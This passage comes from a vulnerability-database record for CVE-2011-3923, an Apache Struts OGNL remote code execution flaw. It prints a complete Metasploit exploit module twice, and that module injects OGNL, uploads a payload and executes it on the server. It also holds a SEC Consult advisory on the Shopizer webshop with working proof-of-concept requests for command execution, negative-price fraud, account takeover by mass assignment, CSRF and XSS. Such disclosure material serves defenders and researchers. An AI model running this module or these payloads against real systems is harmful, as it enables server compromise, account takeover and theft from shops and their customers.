d2sec_struts3 \n---|--- \n**CVE**| CVE-2011-3923 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts3 \n**Notes**| \n", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-01T14:15:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS3", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2019-11-01T14:15:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts3", "id": "D2SEC_STRUTS3", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:58:23", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78561", "id": "SSV:78561", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\r\n for the use of parentheses which in turn allows it to interpret parameter values as\r\n OGNL expressions during certain exception handling for mismatched data types of\r\n properties which allows remote attackers to execute arbitrary Java code via a\r\n crafted parameter.\r\n },\r\n 'Author' =>\r\n [\r\n 'Meder Kydyraliev', # Vulnerability Discovery and PoC\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module\r\n 'mihi' #ARCH_JAVA support\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-3923'],\r\n [ 'OSVDB', '78501'],\r\n [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'windows'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Oct 01 2011',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject = "PARAMETERTOKEN=(#context[\\"xwork.MethodAccessor.denyMethodExecution\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\"allowStaticMethodAccess\\"]"\r\n inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"\r\n inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))\r\n inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))\r\n uri = String.new(datastore['TARGETURI'])\r\n uri = normalize_uri(uri)\r\n uri.gsub!(/INJECT/,inject) # append the injection string\r\n resp = send_request_cgi({\r\n 'uri' => uri,\r\n 'version' => '1.1',\r\n 'method' => 'GET',\r\n })\r\n return resp #Used for check function.\r\n end\r\n\r\n def exploit\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = 'false'\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = "/tmp/#{@payload_exe}"\r\n chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\\"/bin/sh_-c_chmod +x #{@payload_exe}\\".split(\\"_\\"))"\r\n exec_cmd = "@java.lang.Runtime@getRuntime().exec(\\"/bin/sh_-c_#{@payload_exe}\\".split(\\"_\\"))"\r\n when 'java'\r\n @payload_exe << ".jar"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = ""\r\n exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"\r\n exec_cmd << "#q.setAccessible(true),#q.set(null,true),"\r\n exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"\r\n exec_cmd << "#q.setAccessible(true),#q.set(null,false),"\r\n exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"\r\n exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"\r\n exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("\r\n exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"\r\n when 'windows'\r\n @payload_exe = "./#{@payload_exe}.exe"\r\n exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n #Now with all the arch specific stuff set, perform the upload.\r\n #109 = length of command string plus the max length of append.\r\n sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length\r\n chunk_length = 2048 - sub_from_chunk\r\n chunk_length = ((chunk_length/4).floor)*3\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = ""\r\n cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"\r\n cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"\r\n cmd << "#f.close()"\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"\r\n t1 = Time.now\r\n print_status("Asking remote server to sleep for #{sleep_time} seconds")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-78561", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:25", "description": "", "cvss3": {}, "published": "2013-03-22T00:00:00", "type": "packetstorm", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2013-03-22T00:00:00", "id": "PACKETSTORM:120908", "href": "https://packetstormsecurity.com/files/120908/Apache-Struts-ParametersInterceptor-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows \nfor the use of parentheses which in turn allows it to interpret parameter values as \nOGNL expressions during certain exception handling for mismatched data types of \nproperties which allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. \n}, \n'Author' => \n[ \n'Meder Kydyraliev', # Vulnerability Discovery and PoC \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module \n'mihi' #ARCH_JAVA support \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-3923'], \n[ 'OSVDB', '78501'], \n[ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'windows' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'Oct 01 2011', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',\"username\"]), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', \"/blank-struts2/login.action?INJECT\"]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject = \"PARAMETERTOKEN=(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\" \ninject << \"=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true\" \ninject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) \ninject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) \nuri = String.new(datastore['TARGETURI']) \nuri = normalize_uri(uri) \nuri.gsub!(/INJECT/,inject) # append the injection string \nresp = send_request_cgi({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}) \nreturn resp #Used for check function. \nend \n \ndef exploit \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = 'false' \n#Now arch specific... \ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \n#Now with all the arch specific stuff set, perform the upload. \n#109 = length of command string plus the max length of append. \nsub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length \nchunk_length = 2048 - sub_from_chunk \nchunk_length = ((chunk_length/4).floor)*3 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = 'false') \ncmd = \"\" \ncmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\" \ncmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\" \ncmd << \"#f.close()\" \nexecute_command(cmd) \nend \n \ndef check \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/120908/struts_code_exec_parameters.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:35:04", "description": "Apache Struts before 2.3.1.2 allows remote attackers to bypass security protections in the ParameterInterceptor class and execute arbitrary commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-01T14:15:00", "type": "cve", "title": "CVE-2011-3923", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2019-12-02T18:39:00", "cpe": ["cpe:/a:redhat:jboss_enterprise_web_server:1.0.0"], "id": "CVE-2011-3923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3923", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:redhat:jboss_enterprise_web_server:1.0.0:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20140710-0 >\r\n=======================================================================\r\n title: Multiple critical vulnerabilities in Shopizer webshop\r\n product: Shopizer\r\n vulnerable version: 1.1.5 and below\r\n fixed version: v2 (new codebase)\r\n impact: critical\r\n homepage: http://www.shopizer.com/\r\n found: 2012-01-10\r\n by: Johannes Dahse, Johannes Greil\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\nVendor description:\r\n- -------------------\r\nShopizer is an open source java shopping cart and e-commerce content\r\nmanagement software (CMS). The system is built on Struts 2, Hibernate and\r\nSpring. JQuery ui and ajax are heavily used on the ui as well as DWR and\r\nStruts2-jQuery plug-in. (http://www.shopizer.com/)\r\n\r\n\r\nVulnerability overview/description:\r\n- -----------------------------------\r\nShopizer is prone to at least the following vulnerabilities, some of them are highly\r\ncritical:\r\n\r\n1.) Remote Command Execution\r\n\r\nShopizer 1.1.5 is using Apache Struts 2.2.1.1 and is thus vulnerable to Remote\r\nCommand Execution. Shopizer 1.1.3 and below is built on Apache Struts 2.1.6\r\nand is also affected.\r\n\r\nFore more details please refer to:\r\n * https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm#a18\r\n * http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html\r\n\r\nThis affects the shop and admin interface (central).\r\n\r\n2.) Manipulation of product prices\r\n\r\nWhen buying products in Shopizer the product costs for a single product is\r\ncalculated by the selected quantity times the price of the product. The\r\ntotal costs of all products is the adding of all product costs. An attacker\r\ncan specify negative quantities to decrease the total costs.\r\n\r\nThis affects the shop.\r\n\r\n3.) Manipulation of customer data / mass assignment\r\n\r\nAn attacker can change the contact details of a customer by modifying the\r\ncustomerId in the change request. In example this allows him to modify the\r\nshipping address to retrieve products bought by another customer.\r\n\r\nFurthermore, a malicious admin user (sm-central) is able to change the\r\npasswords of other user accounts by appending a "customer.customerPassword"\r\nHTTP parameter when saving user details. This is possible _although_ there\r\nis no UI (form field) for this within the admin interface.\r\n\r\nThis affects the shop and admin interface (central).\r\n\r\n4.) Cross-Site Request Forgery\r\n\r\nModifying customer data is also prone to CSRF attacks. Additionally, the\r\nattacker can change customer passwords, shop configuration, product details\r\nand product prices by sending CSRF requests to the administration interface.\r\n\r\nThis affects the shop and admin interface (central).\r\n\r\n5.) Missing anti brute force protection\r\n\r\nNo protection against brute force attacks regarding login credentials is\r\nimplemented. Attackers can guess for weak passwords of users, as the\r\npassword policy of the shop only allows exactly between 6 and 8 characters.\r\nThe use of special chars or digits is not being enforced.\r\n\r\nThis affects the shop and admin interface (central).\r\n\r\n6.) Cross-Site Scripting\r\n\r\nThe Shopizer Admin Interface suffers from multiple reflected XSS\r\nvulnerabilities.\r\n\r\n\r\n\r\nProof of concept:\r\n- -----------------\r\n1.) Remote Command Execution in Struts\r\n\r\na) Via exception\r\n\r\nThe following URL will trigger an exception for an invalid "productId" data\r\ntype and Struts will re-evaluate the specified value as OGNL expression. An\r\nattacker can successfully bypass security restrictions of Struts and execute\r\narbitrary Java code, leading to Remote Command Execution.\r\n\t/shop/product/reviews.action?product.productId=secconsult'%2b(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'\r\n\r\nOther numeric parameters are affected as well.\r\n\r\nb) Via ParameterInterceptor\r\n\r\nThe following URL will store a OGNL expression in the property "search" of\r\ntype String. This OGNL expression can then be accessed by a dynamic function\r\ncall in another parameter leading to Remote Command Execution.\r\n\t/shop/search.action?search=(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))(secconsult)&z[(search)('secconsult')]=true\r\n\r\n\t\r\n2.) Manipulation of product prices\r\n\r\nAssuming the shop has a product1 (300$) and a product2 (290$) for the total\r\ncosts of 590$. The following steps can be reproduced by a malicious user to\r\ndecrease the total costs when buying those products:\r\n\r\n\ta) Add product1 and product2 to the shopping cart\r\n\tb) Go to the shopping cart and press "recalculate"\r\n\tc) Intercept the ajax DWR request and modify the number reference of the\r\n\t parameter "productQuantity" for product2 to a negative value (-1):\r\n\r\n\t\tc0-e3=string:2\r\n\t\tc0-e4=number:-1\r\n\t\tc0-e1=Object_Object:{productId:reference:c0-e3, productQuantity:reference:c0-e4}\r\n\r\n\td) The new costs for product2 now recalculate to: -1 x 290 = -290$\r\n\te) the new total costs is: product1 + product2 = 300$ + (-290$) = 10$\r\n\tf) continue shopping and pay 10$ for products worth 590$.\r\n\r\nThis is especially critical for shops that only provide digital products.\r\n\r\nFurthermore, during the second step of the checkout process it is\r\npossible to add a negative quantity of products exploiting a Shopizer's\r\nfeature called "standalone shopping cart". This results in a negative price.\r\nBy issuing the following specially crafted request in the separate tab of\r\nthe web browser, while the first tab contains the second step of the checkout\r\nprocess, the total price will be decreased. Note that the page must be\r\nrefreshed after the request to reflect the changes.\r\n\r\n\t/shop/cart/addToCart?merchantId=1&productId=43&qty=-240\r\n\r\n\r\n3.) Manipulation of customer data / mass assignment\r\n\r\nIt's possible to overwrite user data of an arbitrary\r\nuser and gain access to his account and personal information _when\r\nregistering a new user_.\r\nTo achieve this, a malicious user has to add the customer.customerId\r\nparameter to the HTTP request and specify the value of the parameter\r\nto match the target user e.g. 87 when registering a new user.\r\nFor example, the following request will overwrite the user data\r\nincluding username and password of the user with the ID 87.\r\n\r\n\tPOST /shop/profile/register.action HTTP/1.1\r\n\t[...]\r\n\tstruts.token.name=struts.token&struts.token=8393EPOT4BN4CNYAJ6ETRI9DNR2FSP1R&formstate=list&customer.customerNick=SecTest&newPassword=SecTest123&repeatNewPassword=SecTest123&customer.customerCompany=SecTest&customer.customerGender=M&customer.customerTitel=SecTest&customer.customerFirstname=SecTest&customer.customerLastname=SecTest&customer.customerTelephone=&customer.customerEmailAddress=sectest@example.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=SecTest&customer.customerCity=SecTest&customer.customerStreetAddress=SecTest&customer.customerHouseAddress=SecTest&captcha_honeypot=&customer.customerPrivacyRules=1&customer.customerId=87\r\n\r\nIn this case no account confirmation is needed. Instant access\r\nto the overwritten account and its data is possible using the\r\nnew username SecTest and the newly specified password! An attacker is able to\r\naccess sensitive data (order information,\r\npersonal information etc.).\r\n\r\nAdditionally, the following request will overwrite the contact data of customer id 10,\r\nincluding the name, shipping address and billing address:\r\n\t/shop/profile/changeAddress.action?formstate=list&customer.customerId=10&customer.customerCompany=secconsult&customer.customerGender=&customer.customerTitel=&customer.customerFirstname=secconsult&customer.customerLastname=secconsult&customer.customerTelephone=00&customer.customerEmailAddress=owned@secconsult.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=1190&customer.customerCity=secconsult&customer.customerStreetAddress=secconsult&customer.customerHouseAddress=17&customer.customerAnonymous=false&customer.customerBillingTitel=&customer.customerBillingFirstName=secconsult&customer.customerBillingLastName=secconsult&customer.customerBillingStreetAddress=secconsult&customer.customerBillingHouseAddress=17&customer.customerBillingCity=secconsult&customer.customerBillingZoneId=95&customer.customerBillingState=secconsult&customer.customerBillingPostalCode=1190&customer.customerBillingCountryId=14&customer.customerLang=de&customer.customerPrivacyRul\r\nes=1&customer.\r\ncustomerNick=secconsult\r\n\r\nNote that in this specific case the account of the attacker and the victim will not\r\nbe able to login again after the attack, because the nickname will be\r\noverwritten and found twice during login.\r\n\r\nFurthermore, the administration interface does not offer a UI to change user\r\npasswords. By appending the parameter "customer.customerPassword" an attacker\r\nis able to change the password of arbitrary users within the customer details\r\npage.\r\n\r\n\r\n4.) Cross-Site Request Forgery\r\n\r\nThe following image will alter the product price for the product 30 when\r\nrendered by the browser of an logged in webshop administrator:\r\n\r\n\t<img\r\nsrc="/central/catalog/saveproduct.action?categ=30&product.productType=1&product.productStatus=true&__checkbox_product.productStatus=true&__checkbox_product.productVirtual=true&__checkbox_product.productIsFree=false&dateavailable=2012-01-24&price=1.00&product.productExternalDl=1&names[0]=secconsult&seo[0]=secconsult&title[0]=secconsult&highlights[0]=secconsult&descriptions[0]=secconsult&metadescriptions[0]=secconsult&downloadurl[0]=&uploadimage=&weight=1.0&width=1.0&length=1.0&height=1.0&product.productQuantity=99&product.productQuantityOrderMax=99&product.productSortOrder=1&product.productTaxClassId=1&product.productId=30&product.productImage=&product.productImageLarge=&product.productImage1=&product.productImage2=&product.productImage3=&product.productImage4="/>\r\n\r\nFurthermore, the parameter "__checkbox_product.productIsFree" can also be set\r\nto "true".\r\n\r\nAdditionally, the administration interface allows to overwrite the password\r\nhash of every customer which can also be exploited via CSRF.\r\n\r\nThe product review form is also vulnerable to Cross-Site Request Forgery\r\nattacks. A similar request to the following URL will result in a product\r\nreview being posted in the context of the currently logged in user. Note\r\nthat the URL does not contain any parameter that is holding a nonce value.\r\n\r\n\r\n/shop/product/createReview.action?product.productId=43&rating=5&star=5&reviewText=Excellent&=\r\n\r\n\r\n5.) Missing anti brute force protection\r\n\r\nNo proof-of-concept is necessary. See source:\r\nsm-central/src/com/salesmanager/central/profile/ProfileAction.java\r\nLine 525 - 530 of shopizer 1.1.5\r\n\r\n\r\n6.) Cross-Site Scripting\r\n\r\n\t/central/orders/searchcriteria.action?customername="><script>alert(document.cookie)</script>\r\n\t/central/catalog/productlist.action?productname="><script>alert(document.cookie)</script>&availability=2"><script>alert(document.cookie)</script>&status=2"><script>alert(document.cookie)</script>\r\n\r\nE.g. source code:\r\nsm-central/WebContent/orders/orderlist.jsp\r\nLine: 118\r\n\r\nSEC Consult assumes, that many more XSS vulnerabilities exist within this\r\nsoftware as no proper filtering is implemented.\r\n\r\n\r\n\r\nVulnerable / tested versions:\r\n- -----------------------------\r\nAll vulnerabilities could be reproduced with Shopizer 1.1.5 and 1.1.3\r\n\r\n\r\n\r\nVendor contact timeline:\r\n- ------------------------\r\n2012-01-10: The vulnerabilities have been found during a short blackbox test\r\n of a shopizer installation during a customer project\r\n2012-12-20: Customer allows contacting vendor\r\n2013-01-10: Contacting vendor through support@shopizer.com, fast reply,\r\n sending advisory\r\n2013-01-22: Asking for status update, reply: vendor takes a look\r\n2013-02-26: Asking for status update, vendor has some questions regarding\r\n version numbers\r\n2013-03-22: Asking for status update again\r\n2013-03-23: Vendor: Release 2 is scheduled for June\r\n2013-06-25: Asking for status update, no answer\r\n2013-07-01: Sending deadline for advisory release\r\n2013-07-07: Vendor: Version 2 of shopizer delayed\r\n2013-07-08: Asking for new release date\r\n2013-07-09: Vendor: moving from Struts to Spring & Spring security\r\n2013-10-03: Asking again for release date\r\n2013-10-06: Vendor: Release shortly\r\n2013-12-10: Asking for update\r\n2013-12-12: Vendor: Release date set for January 2014\r\n2014-06: Vendor releases v2\r\n2014-07-10: SEC Consult releases security advisory\r\n\r\n\r\n\r\nSolution:\r\n- ---------\r\nUsing the old version branch 1.x is not recommended as there are no security\r\nfixes implemented by the vendor.\r\n\r\nVersion 2 has been released by the vendor, but it has not been tested by SEC\r\nConsult and it is unclear whether the issues have been solved.\r\n\r\n\r\nWorkaround:\r\n- -----------\r\nThese workarounds have to be implemented in source:\r\n* Update the Apache Struts library to the latest version available.\r\n* Disallow negative product quantities.\r\n* Identify customers by session and not by customerId parameter.\r\n\r\nFurthermore, change the default login (admin:password) for the administration\r\ninterface.\r\n\r\n\r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n\r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n\r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n\r\nEOF J. Dahse, J. Greil / 2012, 2013, 2014\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG 